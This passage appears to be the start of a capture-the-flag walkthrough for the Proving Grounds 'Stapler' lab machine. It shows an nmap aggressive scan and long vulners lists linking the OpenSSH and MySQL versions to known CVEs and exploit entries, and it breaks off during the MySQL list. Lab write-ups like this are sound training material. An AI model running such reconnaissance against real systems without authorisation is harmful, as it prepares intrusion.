PG - Stapler

PG – Stapler

In this walk through, we will be going through the Stapler room from Proving Grounds. This room is rated as Intermediate on the platform that has two or more routes of exploitation. One is a direct vulnerability exploitation on a vulnerable Samba server and other is through LFI on a wordpress installation via a vulnerable plugin. So, let’s get started without any delay.

Stapler

Machine Info:

TitleStapler
IPaddress192.168.225.148
DifficultyIntermediate
OSLinux
DescriptionStapler is an intermediate level machine that has two or more routes of exploitation. One is a direct vulnerability exploitation on a vulnerable Samba server and other is through LFI on a wordpress installation via a vulnerable plugin.

Enumeration:

  • I started off with my regular aggressive nmap scan with a -Pn flag set to skip host discovery as the machine was not responding to the ICMP ping requests. Found multiple ports opened – 21 (FTP), 22 (SSH), 80 (HTTP), 139 (Samba), 666 (Doom), 3306 (MySQL).

$ sudo nmap -Pn -A 192.168.228.148
Starting Nmap 7.80 ( https://nmap.org ) at 2024-01-07 21:22 IST

Nmap scan report for 192.168.225.148
Host is up (0.19s latency).
Not shown: 993 filtered ports
PORT     STATE  SERVICE     VERSION
20/tcp   closed ftp-data
21/tcp   open   ftp         vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 550 Permission denied.
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.45.239
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp   open   ssh         OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)
|   256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)
|_  256 6d:01:b7:73:ac:b0:93:6f:fa:b9:89:e6:ae:3c:ab:d3 (ED25519)
| vulners: 
|   cpe:/a:openbsd:openssh:7.2p2: 
|     	PRION:CVE-2016-8858	7.8	https://vulners.com/prion/PRION:CVE-2016-8858
|     	PRION:CVE-2016-6515	7.8	https://vulners.com/prion/PRION:CVE-2016-6515
|     	PACKETSTORM:140070	7.8	https://vulners.com/packetstorm/PACKETSTORM:140070	*EXPLOIT*
|     	EXPLOITPACK:5BCA798C6BA71FAE29334297EC0B6A09	7.8	https://vulners.com/exploitpack/EXPLOITPACK:5BCA798C6BA71FAE29334297EC0B6A09	*EXPLOIT*
|     	EDB-ID:40888	7.8	https://vulners.com/exploitdb/EDB-ID:40888	*EXPLOIT*
|     	CVE-2016-8858	7.8	https://vulners.com/cve/CVE-2016-8858
|     	CVE-2016-6515	7.8	https://vulners.com/cve/CVE-2016-6515
|     	1337DAY-ID-26494	7.8	https://vulners.com/zdt/1337DAY-ID-26494	*EXPLOIT*
|     	SSV:92579	7.5	https://vulners.com/seebug/SSV:92579	*EXPLOIT*
|     	PRION:CVE-2023-35784	7.5	https://vulners.com/prion/PRION:CVE-2023-35784
|     	PRION:CVE-2016-10009	7.5	https://vulners.com/prion/PRION:CVE-2016-10009
|     	PACKETSTORM:173661	7.5	https://vulners.com/packetstorm/PACKETSTORM:173661	*EXPLOIT*
|     	CVE-2016-10009	7.5	https://vulners.com/cve/CVE-2016-10009
|     	1337DAY-ID-26576	7.5	https://vulners.com/zdt/1337DAY-ID-26576	*EXPLOIT*
|     	SSV:92582	7.2	https://vulners.com/seebug/SSV:92582	*EXPLOIT*
|     	PRION:CVE-2016-10012	7.2	https://vulners.com/prion/PRION:CVE-2016-10012
|     	PRION:CVE-2015-8325	7.2	https://vulners.com/prion/PRION:CVE-2015-8325
|     	CVE-2016-10012	7.2	https://vulners.com/cve/CVE-2016-10012
|     	CVE-2015-8325	7.2	https://vulners.com/cve/CVE-2015-8325
|     	SSV:92580	6.9	https://vulners.com/seebug/SSV:92580	*EXPLOIT*
|     	PRION:CVE-2016-10010	6.9	https://vulners.com/prion/PRION:CVE-2016-10010
|     	CVE-2016-10010	6.9	https://vulners.com/cve/CVE-2016-10010
|     	1337DAY-ID-26577	6.9	https://vulners.com/zdt/1337DAY-ID-26577	*EXPLOIT*
|     	EXPLOITPACK:98FE96309F9524B8C84C508837551A19	5.8	https://vulners.com/exploitpack/EXPLOITPACK:98FE96309F9524B8C84C508837551A19	*EXPLOIT*
|     	EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97	5.8	https://vulners.com/exploitpack/EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97	*EXPLOIT*
|     	EDB-ID:46516	5.8	https://vulners.com/exploitdb/EDB-ID:46516	*EXPLOIT*
|     	EDB-ID:46193	5.8	https://vulners.com/exploitdb/EDB-ID:46193	*EXPLOIT*
|     	CVE-2019-6111	5.8	https://vulners.com/cve/CVE-2019-6111
|     	1337DAY-ID-32328	5.8	https://vulners.com/zdt/1337DAY-ID-32328	*EXPLOIT*
|     	1337DAY-ID-32009	5.8	https://vulners.com/zdt/1337DAY-ID-32009	*EXPLOIT*
|     	SSV:91041	5.5	https://vulners.com/seebug/SSV:91041	*EXPLOIT*
|     	PRION:CVE-2016-3115	5.5	https://vulners.com/prion/PRION:CVE-2016-3115
|     	PACKETSTORM:140019	5.5	https://vulners.com/packetstorm/PACKETSTORM:140019	*EXPLOIT*
|     	PACKETSTORM:136234	5.5	https://vulners.com/packetstorm/PACKETSTORM:136234	*EXPLOIT*
|     	EXPLOITPACK:F92411A645D85F05BDBD274FD222226F	5.5	https://vulners.com/exploitpack/EXPLOITPACK:F92411A645D85F05BDBD274FD222226F	*EXPLOIT*
|     	EXPLOITPACK:9F2E746846C3C623A27A441281EAD138	5.5	https://vulners.com/exploitpack/EXPLOITPACK:9F2E746846C3C623A27A441281EAD138	*EXPLOIT*
|     	EXPLOITPACK:1902C998CBF9154396911926B4C3B330	5.5	https://vulners.com/exploitpack/EXPLOITPACK:1902C998CBF9154396911926B4C3B330	*EXPLOIT*
|     	EDB-ID:40858	5.5	https://vulners.com/exploitdb/EDB-ID:40858	*EXPLOIT*
|     	EDB-ID:40119	5.5	https://vulners.com/exploitdb/EDB-ID:40119	*EXPLOIT*
|     	EDB-ID:39569	5.5	https://vulners.com/exploitdb/EDB-ID:39569	*EXPLOIT*
|     	CVE-2016-3115	5.5	https://vulners.com/cve/CVE-2016-3115
|     	SSH_ENUM	5.0	https://vulners.com/canvas/SSH_ENUM	*EXPLOIT*
|     	PRION:CVE-2023-27567	5.0	https://vulners.com/prion/PRION:CVE-2023-27567
|     	PRION:CVE-2018-15919	5.0	https://vulners.com/prion/PRION:CVE-2018-15919
|     	PRION:CVE-2018-15473	5.0	https://vulners.com/prion/PRION:CVE-2018-15473
|     	PRION:CVE-2017-15906	5.0	https://vulners.com/prion/PRION:CVE-2017-15906
|     	PRION:CVE-2016-10708	5.0	https://vulners.com/prion/PRION:CVE-2016-10708
|     	PACKETSTORM:150621	5.0	https://vulners.com/packetstorm/PACKETSTORM:150621	*EXPLOIT*
|     	EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0	5.0	https://vulners.com/exploitpack/EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0	*EXPLOIT*
|     	EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283	5.0	https://vulners.com/exploitpack/EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283	*EXPLOIT*
|     	EDB-ID:45939	5.0	https://vulners.com/exploitdb/EDB-ID:45939	*EXPLOIT*
|     	EDB-ID:45233	5.0	https://vulners.com/exploitdb/EDB-ID:45233	*EXPLOIT*
|     	CVE-2018-15919	5.0	https://vulners.com/cve/CVE-2018-15919
|     	CVE-2018-15473	5.0	https://vulners.com/cve/CVE-2018-15473
|     	CVE-2017-15906	5.0	https://vulners.com/cve/CVE-2017-15906
|     	CVE-2016-10708	5.0	https://vulners.com/cve/CVE-2016-10708
|     	1337DAY-ID-31730	5.0	https://vulners.com/zdt/1337DAY-ID-31730	*EXPLOIT*
|     	PRION:CVE-2019-16905	4.4	https://vulners.com/prion/PRION:CVE-2019-16905
|     	PRION:CVE-2023-29323	4.3	https://vulners.com/prion/PRION:CVE-2023-29323
|     	PRION:CVE-2016-6210	4.3	https://vulners.com/prion/PRION:CVE-2016-6210
|     	EXPLOITPACK:802AF3229492E147A5F09C7F2B27C6DF	4.3	https://vulners.com/exploitpack/EXPLOITPACK:802AF3229492E147A5F09C7F2B27C6DF	*EXPLOIT*
|     	EXPLOITPACK:5652DDAA7FE452E19AC0DC1CD97BA3EF	4.3	https://vulners.com/exploitpack/EXPLOITPACK:5652DDAA7FE452E19AC0DC1CD97BA3EF	*EXPLOIT*
|     	EDB-ID:40136	4.3	https://vulners.com/exploitdb/EDB-ID:40136	*EXPLOIT*
|     	EDB-ID:40113	4.3	https://vulners.com/exploitdb/EDB-ID:40113	*EXPLOIT*
|     	CVE-2023-29323	4.3	https://vulners.com/cve/CVE-2023-29323
|     	CVE-2020-14145	4.3	https://vulners.com/cve/CVE-2020-14145
|     	CVE-2016-6210	4.3	https://vulners.com/cve/CVE-2016-6210
|     	1337DAY-ID-25440	4.3	https://vulners.com/zdt/1337DAY-ID-25440	*EXPLOIT*
|     	1337DAY-ID-25438	4.3	https://vulners.com/zdt/1337DAY-ID-25438	*EXPLOIT*
|     	PRION:CVE-2019-6110	4.0	https://vulners.com/prion/PRION:CVE-2019-6110
|     	PRION:CVE-2019-6109	4.0	https://vulners.com/prion/PRION:CVE-2019-6109
|     	CVE-2019-6110	4.0	https://vulners.com/cve/CVE-2019-6110
|     	CVE-2019-6109	4.0	https://vulners.com/cve/CVE-2019-6109
|     	PRION:CVE-2019-6111	2.6	https://vulners.com/prion/PRION:CVE-2019-6111
|     	PRION:CVE-2018-20685	2.6	https://vulners.com/prion/PRION:CVE-2018-20685
|     	CVE-2018-20685	2.6	https://vulners.com/cve/CVE-2018-20685
|     	SSV:92581	2.1	https://vulners.com/seebug/SSV:92581	*EXPLOIT*
|     	PRION:CVE-2016-10011	2.1	https://vulners.com/prion/PRION:CVE-2016-10011
|     	CVE-2016-10011	2.1	https://vulners.com/cve/CVE-2016-10011
|     	PACKETSTORM:151227	0.0	https://vulners.com/packetstorm/PACKETSTORM:151227	*EXPLOIT*
|     	PACKETSTORM:140261	0.0	https://vulners.com/packetstorm/PACKETSTORM:140261	*EXPLOIT*
|     	PACKETSTORM:138006	0.0	https://vulners.com/packetstorm/PACKETSTORM:138006	*EXPLOIT*
|     	PACKETSTORM:137942	0.0	https://vulners.com/packetstorm/PACKETSTORM:137942	*EXPLOIT*
|     	MSF:AUXILIARY-SCANNER-SSH-SSH_ENUMUSERS-	0.0	https://vulners.com/metasploit/MSF:AUXILIARY-SCANNER-SSH-SSH_ENUMUSERS-	*EXPLOIT*
|_    	1337DAY-ID-30937	0.0	https://vulners.com/zdt/1337DAY-ID-30937	*EXPLOIT*
80/tcp   open   http        PHP cli server 5.5 or later
|_http-title: 404 Not Found
139/tcp  open   netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
666/tcp  open   doom?
| fingerprint-strings: 
|   NULL: 
|     message2.jpgUT 
|     QWux
|     "DL[E
|     #;3[
|     \xf6
|     u([r
|     qYQq
|     Y_?n2
|     3&M~{
|     9-a)T
|     L}AJ
|_    .npy.9
3306/tcp open   mysql       MySQL 5.7.12-0ubuntu1
| mysql-info: 
|   Protocol: 10
|   Version: 5.7.12-0ubuntu1
|   Thread ID: 8
|   Capabilities flags: 63487
|   Some Capabilities: FoundRows, DontAllowDatabaseTableColumn, Speaks41ProtocolOld, ConnectWithDatabase, IgnoreSpaceBeforeParenthesis, LongPassword, SupportsTransactions, IgnoreSigpipes, ODBCClient, LongColumnFlag, Speaks41ProtocolNew, Support41Auth, SupportsCompression, InteractiveClient, SupportsLoadDataLocal, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments
|   Status: Autocommit
|   Salt: d1yr\x0E*OypiEv\x12	;	\x10-	T
|_  Auth Plugin Name: mysql_native_password
| vulners: 
|   cpe:/a:mysql:mysql:5.7.12-0ubuntu1: 
|     	SSV:92513	10.0	https://vulners.com/seebug/SSV:92513	*EXPLOIT*
|     	SSV:92510	10.0	https://vulners.com/seebug/SSV:92510	*EXPLOIT*
|     	SSV:92405	10.0	https://vulners.com/seebug/SSV:92405	*EXPLOIT*
|     	PRION:CVE-2016-6662	10.0	https://vulners.com/prion/PRION:CVE-2016-6662
|     	PACKETSTORM:139491	10.0	https://vulners.com/packetstorm/PACKETSTORM:139491	*EXPLOIT*
|     	PACKETSTORM:139476	10.0	https://vulners.com/packetstorm/PACKETSTORM:139476	*EXPLOIT*
|     	EDB-ID:40679	10.0	https://vulners.com/exploitdb/EDB-ID:40679	*EXPLOIT*
|     	EDB-ID:40678	10.0	https://vulners.com/exploitdb/EDB-ID:40678	*EXPLOIT*
|     	SSV:92976	7.8	https://vulners.com/seebug/SSV:92976	*EXPLOIT*
|     	PRION:CVE-2018-2696	7.8	https://vulners.com/prion/PRION:CVE-2018-2696
|     	PRION:CVE-2017-3599	7.8	https://vulners.com/prion/PRION:CVE-2017-3599
|     	EDB-ID:41954	7.8	https://vulners.com/exploitdb/EDB-ID:41954	*EXPLOIT*
|     	1337DAY-ID-27705	7.8	https://vulners.com/zdt/1337DAY-ID-27705	*EXPLOIT*
|     	PRION:CVE-2020-14760	7.5	https://vulners.com/prion/PRION:CVE-2020-14760
|     	PRION:CVE-2019-14540	7.5	https://vulners.com/prion/PRION:CVE-2019-14540
|     	PRION:CVE-2018-2647	7.5	https://vulners.com/prion/PRION:CVE-2018-2647
|     	PRION:CVE-2018-2612	7.5	https://vulners.com/prion/PRION:CVE-2018-2612
|     	PRION:CVE-2018-2562	7.5	https://vulners.com/prion/PRION:CVE-2018-2562
|     	PRION:CVE-2016-9843	7.5	https://vulners.com/prion/PRION:CVE-2016-9843
|     	PRION:CVE-2016-9841	7.5	https://vulners.com/prion/PRION:CVE-2016-9841
|     	PRION:CVE-2016-6664	6.9	https://vulners.com/prion/PRION:CVE-2016-6664
|     	1337DAY-ID-26205	6.9	https://vulners.com/zdt/1337DAY-ID-26205	*EXPLOIT*
|     	PRION:CVE-2021-2060	6.8	https://vulners.com/prion/PRION:CVE-2021-2060
|     	PRION:CVE-2021-2014	6.8	https://vulners.com/prion/PRION:CVE-2021-2014
|     	PRION:CVE-2020-14869	6.8	https://vulners.com/prion/PRION:CVE-2020-14869
|     	PRION:CVE-2020-14867	6.8	https://vulners.com/prion/PRION:CVE-2020-14867
|     	PRION:CVE-2018-2766	6.8	https://vulners.com/prion/PRION:CVE-2018-2766
|     	PRION:CVE-2018-2703	6.8	https://vulners.com/prion/PRION:CVE-2018-2703
|     	PRION:CVE-2018-2668	6.8	https://vulners.com/prion/PRION:CVE-2018-2668
|     	PRION:CVE-2018-2667	6.8	https://vulners.com/prion/PRION:CVE-2018-2667
|     	PRION:CVE-2018-2665	6.8	https://vulners.com/prion/PRION:CVE-2018-2665
|     	PRION:CVE-2018-2646	6.8	https://vulners.com/prion/PRION:CVE-2018-2646
|     	PRION:CVE-2018-2640	6.8	https://vulners.com/prion/PRION:CVE-2018-2640
|     	PRION:CVE-2018-2622	6.8	https://vulners.com/prion/PRION:CVE-2018-2622
|     	PRION:CVE-2018-2600	6.8	https://vulners.com/prion/PRION:CVE-2018-2600
|     	PRION:CVE-2018-2591	6.8	https://vulners.com/prion/PRION:CVE-2018-2591
|     	PRION:CVE-2018-2590	6.8	https://vulners.com/prion/PRION:CVE-2018-2590
|     	PRION:CVE-2018-2586	6.8	https://vulners.com/prion/PRION:CVE-2018-2586
|     	PRION:CVE-2018-2583	6.8	https://vulners.com/prion/PRION:CVE-2018-2583
|     	PRION:CVE-2018-2576	6.8	https://vulners.com/prion/PRION:CVE-2018-2576
|     	PRION:CVE-2018-2573	6.8	https://vulners.com/prion/PRION:CVE-2018-2573
|     	PRION:CVE-2018-2565	6.8	https://vulners.com/prion/PRION:CVE-2018-2565
|     	PRION:CVE-2016-9842	6.8	https://vulners.com/prion/PRION:CVE-2016-9842
|     	PRION:CVE-2016-9840	6.8	https://vulners.com/prion/PRION:CVE-2016-9840
|     	PRION:CVE-2016-5507	6.8	https://vulners.com/prion/PRION:CVE-2016-5507
|     	PRION:CVE-2016-3495	6.8	https://vulners.com/prion/PRION:CVE-2016-3495
|     	PRION:CVE-2016-3492	6.8	https://vulners.com/prion/PRION:CVE-2016-3492
|     	PRION:CVE-2021-2144	6.5	https://vulners.com/prion/PRION:CVE-2021-2144
|     	PRION:CVE-2017-3600	6.0	https://vulners.com/prion/PRION:CVE-2017-3600
|     	PRION:CVE-2017-3633	5.8	https://vulners.com/prion/PRION:CVE-2017-3633
|     	PRION:CVE-2022-21367	5.5	https://vulners.com/prion/PRION:CVE-2022-21367
|     	PRION:CVE-2020-2760	5.5	https://vulners.com/prion/PRION:CVE-2020-2760
|     	PRION:CVE-2019-2791	5.5	https://vulners.com/prion/PRION:CVE-2019-2791
|     	PRION:CVE-2019-2778	5.5	https://vulners.com/prion/PRION:CVE-2019-2778
|     	PRION:CVE-2019-2731	5.5	https://vulners.com/prion/PRION:CVE-2019-2731
|     	PRION:CVE-2019-2534	5.5	https://vulners.com/prion/PRION:CVE-2019-2534
|     	PRION:CVE-2018-3247	5.5	https://vulners.com/prion/PRION:CVE-2018-3247
|     	PRION:CVE-2018-3187	5.5	https://vulners.com/prion/PRION:CVE-2018-3187
|     	PRION:CVE-2018-3185	5.5	https://vulners.com/prion/PRION:CVE-2018-3185
|     	PRION:CVE-2018-3064	5.5	https://vulners.com/prion/PRION:CVE-2018-3064
|     	PRION:CVE-2018-3060	5.5	https://vulners.com/prion/PRION:CVE-2018-3060
|     	PRION:CVE-2018-2812	5.5	https://vulners.com/prion/PRION:CVE-2018-2812
|     	PRION:CVE-2018-2787	5.5	https://vulners.com/prion/PRION:CVE-2018-2787
|     	PRION:CVE-2018-2786	5.5	https://vulners.com/prion/PRION:CVE-2018-2786
|     	PRION:CVE-2017-3455	5.5	https://vulners.com/prion/PRION:CVE-2017-3455
|     	PRION:CVE-2017-3454	5.5	https://vulners.com/prion/PRION:CVE-2017-3454
|     	PRION:CVE-2017-10365	5.5	https://vulners.com/prion/PRION:CVE-2017-10365
|     	PRION:CVE-2020-1967	5.0	https://vulners.com/prion/PRION:CVE-2020-1967
|     	PRION:CVE-2019-2924	5.0	https://vulners.com/prion/PRION:CVE-2019-2924
|     	PRION:CVE-2019-2923	5.0	https://vulners.com/prion/PRION:CVE-2019-2923
|     	PRION:CVE-2019-2922	5.0	https://vulners.com/prion/PRION:CVE-2019-2922
|     	PRION:CVE-2019-2632	5.0	https://vulners.com/prion/PRION:CVE-2019-2632
|     	PRION:CVE-2017-3450	5.0	https://vulners.com/prion/PRION:CVE-2017-3450
|     	PRION:CVE-2017-3329	5.0	https://vulners.com/prion/PRION:CVE-2017-3329
|     	PRION:CVE-2018-3171	4.9	https://vulners.com/prion/PRION:CVE-2018-3171
|     	PRION:CVE-2018-3081	4.9	https://vulners.com/prion/PRION:CVE-2018-3081
|     	PRION:CVE-2018-3066	4.9	https://vulners.com/prion/PRION:CVE-2018-3066
|     	PRION:CVE-2017-3652	4.9	https://vulners.com/prion/PRION:CVE-2017-3652
|     	PRION:CVE-2017-3265	4.9	https://vulners.com/prion/PRION:CVE-2017-3265
|     	PRION:CVE-2019-2819	4.7	https://vulners.com/prion/PRION:CVE-2019-2819
|     	PRION:CVE-2019-2758	4.7	https://vulners.com/prion/PRION:CVE-2019-2758
|     	PRION:CVE-2023-21980	4.6	https://vulners.com/prion/PRION:CVE-2023-21980
|     	PRION:CVE-2016-6663	4.4	https://vulners.com/prion/PRION:CVE-2016-6663
|     	PRION:CVE-2016-5625	4.4	https://vulners.com/prion/PRION:CVE-2016-5625
|     	1337DAY-ID-26204	4.4	https://vulners.com/zdt/1337DAY-ID-26204	*EXPLOIT*
|     	PRION:CVE-2020-2922	4.3	https://vulners.com/prion/PRION:CVE-2020-2922
|     	PRION:CVE-2020-2804	4.3	https://vulners.com/prion/PRION:CVE-2020-2804
|     	PRION:CVE-2020-2574	4.3	https://vulners.com/prion/PRION:CVE-2020-2574
|     	PRION:CVE-2020-2573	4.3	https://vulners.com/prion/PRION:CVE-2020-2573
|     	PRION:CVE-2020-2570	4.3	https://vulners.com/prion/PRION:CVE-2020-2570
|     	PRION:CVE-2019-2910	4.3	https://vulners.com/prion/PRION:CVE-2019-2910
|     	PRION:CVE-2018-3144	4.3	https://vulners.com/prion/PRION:CVE-2018-3144
|     	PRION:CVE-2018-3123	4.3	https://vulners.com/prion/PRION:CVE-2018-3123
|     	PRION:CVE-2018-2761	4.3	https://vulners.com/prion/PRION:CVE-2018-2761
|     	PRION:CVE-2017-3650	4.3	https://vulners.com/prion/PRION:CVE-2017-3650
|     	PRION:CVE-2017-3467	4.3	https://vulners.com/prion/PRION:CVE-2017-3467
|     	PRION:CVE-2022-21592	4.0	https://vulners.com/prion/PRION:CVE-2022-21592
|     	PRION:CVE-2022-21589	4.0	https://vulners.com/prion/PRION:CVE-2022-21589
|     	PRION:CVE-2022-21454	4.0	https://vulners.com/prion/PRION:CVE-2022-21454
|     	PRION:CVE-2022-21427	4.0	https://vulners.com/prion/PRION:CVE-2022-21427
|     	PRION:CVE-2022-21417	4.0	https://vulners.com/prion/PRION:CVE-2022-21417
|     	PRION:CVE-2022-21344	4.0	https://vulners.com/prion/PRION:CVE-2022-21344
|     	PRION:CVE-2022-21245	4.0	https://vulners.com/prion/PRION:CVE-2022-21245
|     	PRION:CVE-2021-35624	4.0	https://vulners.com/prion/PRION:CVE-2021-35624
|     	PRION:CVE-2021-2226	4.0	https://vulners.com/prion/PRION:CVE-2021-2226
|     	PRION:CVE-2021-2202	4.0	https://vulners.com/prion/PRION:CVE-2021-2202
|     	PRION:CVE-2021-2178	4.0	https://vulners.com/prion/PRION:CVE-2021-2178
|     	PRION:CVE-2021-2162	4.0	https://vulners.com/prion/PRION:CVE-2021-2162
|     	PRION:CVE-2021-2160	4.0	https://vulners.com/prion/PRION:CVE-2021-2160
|     	PRION:CVE-2021-2032	4.0	https://vulners.com/prion/PRION:CVE-2021-2032
|     	PRION:CVE-2020-2901	4.0	https://vulners.com/prion/PRION:CVE-2020-2901
|     	PRION:CVE-2020-2814	4.0	https://vulners.com/prion/PRION:CVE-2020-2814
|     	PRION:CVE-2020-2812	4.0	https://vulners.com/prion/PRION:CVE-2020-2812
|     	PRION:CVE-2020-2790	4.0	https://vulners.com/prion/PRION:CVE-2020-2790
|     	PRION:CVE-2020-2780	4.0	https://vulners.com/prion/PRION:CVE-2020-2780
|     	PRION:CVE-2020-2779	4.0	https://vulners.com/prion/PRION:CVE-2020-2779
|     	PRION:CVE-2020-2765	4.0	https://vulners.com/prion/PRION:CVE-2020-2765
|     	PRION:CVE-2020-2763	4.0	https://vulners.com/prion/PRION:CVE-2020-2763
|     	PRION:CVE-2020-2660	4.0	https://vulners.com/prion/PRION:CVE-2020-2660
|     	PRION:CVE-2020-2589	4.0	https://vulners.com/prion/PRION:CVE-2020-2589
|     	PRION:CVE-2020-2579	4.0	https://vulners.com/prion/PRION:CVE-2020-2579
|     	PRION:CVE-2020-2577	4.0	https://vulners.com/prion/PRION:CVE-2020-2577
|     	PRION:CVE-2020-2572	4.0	https://vulners.com/prion/PRION:CVE-2020-2572
|     	PRION:CVE-2020-14827	4.0	https://vulners.com/prion/PRION:CVE-2020-14827
|     	PRION:CVE-2020-14775	4.0	https://vulners.com/prion/PRION:CVE-2020-14775
|     	PRION:CVE-2020-14769	4.0	https://vulners.com/prion/PRION:CVE-2020-14769
|     	PRION:CVE-2020-14765	4.0	https://vulners.com/prion/PRION:CVE-2020-14765
|     	PRION:CVE-2020-14576	4.0	https://vulners.com/prion/PRION:CVE-2020-14576
|     	PRION:CVE-2020-14567	4.0	https://vulners.com/prion/PRION:CVE-2020-14567
|     	PRION:CVE-2020-14559	4.0	https://vulners.com/prion/PRION:CVE-2020-14559
|     	PRION:CVE-2020-14553	4.0	https://vulners.com/prion/PRION:CVE-2020-14553
|     	PRION:CVE-2020-14539	4.0	https://vulners.com/prion/PRION:CVE-2020-14539
|     	PRION:CVE-2019-2974	4.0	https://vulners.com/prion/PRION:CVE-2019-2974
|     	PRION:CVE-2019-2948	4.0	https://vulners.com/prion/PRION:CVE-2019-2948
|     	PRION:CVE-2019-2946	4.0	https://vulners.com/prion/PRION:CVE-2019-2946
|     	PRION:CVE-2019-2914	4.0	https://vulners.com/prion/PRION:CVE-2019-2914
|     	PRION:CVE-2019-2805	4.0	https://vulners.com/prion/PRION:CVE-2019-2805
|     	PRION:CVE-2019-2740	4.0	https://vulners.com/prion/PRION:CVE-2019-2740
|     	PRION:CVE-2019-2730	4.0	https://vulners.com/prion/PRION:CVE-2019-2730
|     	PRION:CVE-2019-2683	4.0	https://vulners.com/prion/PRION:CVE-2019-2683
|     	PRION:CVE-2019-2628	4.0	https://vulners.com/prion/PRION:CVE-2019-2628
|     	PRION:CVE-2019-2627	4.0	https://vulners.com/prion/PRION:CVE-2019-2627
|     	PRION:CVE-2019-2566	4.0	https://vulners.com/prion/PRION:CVE-2019-2566
|     	PRION:CVE-2019-2537	4.0	https://vulners.com/prion/PRION:CVE-2019-2537
|     	PRION:CVE-2019-2532	4.0	https://vulners.com/prion/PRION:CVE-2019-2532
|     	PRION:CVE-2019-2531	4.0	https://vulners.com/prion/PRION:CVE-2019-2531
|     	PRION:CVE-2019-2529	4.0	https://vulners.com/prion/PRION:CVE-2019-2529
|     	PRION:CVE-2019-2528	4.0	https://vulners.com/prion/PRION:CVE-2019-2528
|     	PRION:CVE-2019-2510	4.0	https://vulners.com/prion/PRION:CVE-2019-2510
|     	PRION:CVE-2019-2507	4.0	https://vulners.com/prion/PRION:CVE-2019-2507
|     	PRION:CVE-2019-2486	4.0	https://vulners.com/prion/PRION:CVE-2019-2486
|     	PRION:CVE-2019-2482	4.0	https://vulners.com/prion/PRION:CVE-2019-2482
|     	PRION:CVE-2019-2481	4.0	https://vulners.com/prion/PRION:CVE-2019-2481
|     	PRION:CVE-2019-2455	4.0	https://vulners.com/prion/PRION:CVE-2019-2455
|     	PRION:CVE-2019-2434	4.0	https://vulners.com/prion/PRION:CVE-2019-2434
|     	PRION:CVE-2019-2420	4.0	https://vulners.com/prion/PRION:CVE-2019-2420
|     	PRION:CVE-2018-3282	4.0	https://vulners.com/prion/PRION:CVE-2018-3282
|     	PRION:CVE-2018-3278	4.0	https://vulners.com/prion/PRION:CVE-2018-3278
|     	PRION:CVE-2018-3277	4.0	https://vulners.com/prion/PRION:CVE-2018-3277
|     	PRION:CVE-2018-3276	4.0	https://vulners.com/prion/PRION:CVE-2018-3276
|     	PRION:CVE-2018-3251	4.0	https://vulners.com/prion/PRION:CVE-2018-3251
|     	PRION:CVE-2018-3200	4.0	https://vulners.com/prion/PRION:CVE-2018-3200
|     	PRION:CVE-2018-3173	4.0	https://vulners.com/prion/PRION:CVE-2018-3173
|     	PRION:CVE-2018-3162	4.0	https://vulners.com/prion/PRION:CVE-2018-3162
|     	PRION:CVE-2018-3161	4.0	https://vulners.com/prion/PRION:CVE-2018-3161
|     	PRION:CVE-2018-3156	4.0	https://vulners.com/prion/PRION:CVE-2018-3156
|     	PRION:CVE-2018-3155	4.0	https://vulners.com/prion/PRION:CVE-2018-3155
|     	PRION:CVE-2018-3143	4.0	https://vulners.com/prion/PRION:CVE-2018-3143
|     	PRION:CVE-2018-3133	4.0	https://vulners.com/prion/PRION:CVE-2018-3133
|     	PRION:CVE-2018-3077	4.0	https://vulners.com/prion/PRION:CVE-2018-3077
|     	PRION:CVE-2018-3071	4.0	https://vulners.com/prion/PRION:CVE-2018-3071
|     	PRION:CVE-2018-3070	4.0	https://vulners.com/prion/PRION:CVE-2018-3070
|     	PRION:CVE-2018-3065	4.0	https://vulners.com/prion/PRION:CVE-2018-3065
|     	PRION:CVE-2018-3061	4.0	https://vulners.com/prion/PRION:CVE-2018-3061
|     	PRION:CVE-2018-3058	4.0	https://vulners.com/prion/PRION:CVE-2018-3058
|     	PRION:CVE-2018-3056	4.0	https://vulners.com/prion/PRION:CVE-2018-3056
|     	PRION:CVE-2018-3054	4.0	https://vulners.com/prion/PRION:CVE-2018-3054
|     	PRION:CVE-2018-2846	4.0	https://vulners.com/prion/PRION:CVE-2018-2846
|     	PRION:CVE-2018-2839	4.0	https://vulners.com/prion/PRION:CVE-2018-2839
|     	PRION:CVE-2018-2819	4.0	https://vulners.com/prion/PRION:CVE-2018-2819
|     	PRION:CVE-2018-2818	4.0	https://vulners.com/prion/PRION:CVE-2018-2818
|     	PRION:CVE-2018-2817	4.0	https://vulners.com/prion/PRION:CVE-2018-2817
|     	PRION:CVE-2018-2816	4.0	https://vulners.com/prion/PRION:CVE-2018-2816
|     	PRION:CVE-2018-2813	4.0	https://vulners.com/prion/PRION:CVE-2018-2813
|     	PRION:CVE-2018-2810	4.0	https://vulners.com/prion/PRION:CVE-2018-2810
|     	PRION:CVE-2018-2784	4.0	https://vulners.com/prion/PRION:CVE-2018-2784
|     	PRION:CVE-2018-2782	4.0	https://vulners.com/prion/PRION:CVE-2018-2782
|     	PRION:CVE-2018-2781	4.0	https://vulners.com/prion/PRION:CVE-2018-2781
|     	PRION:CVE-2018-2780	4.0	https://vulners.com/prion/PRION:CVE-2018-2780
|     	PRION:CVE-2018-2779	4.0	https://vulners.com/prion/PRION:CVE-2018-2779
|     	PRION:CVE-2018-2778	4.0	https://vulners.com/prion/PRION:CVE-2018-2778
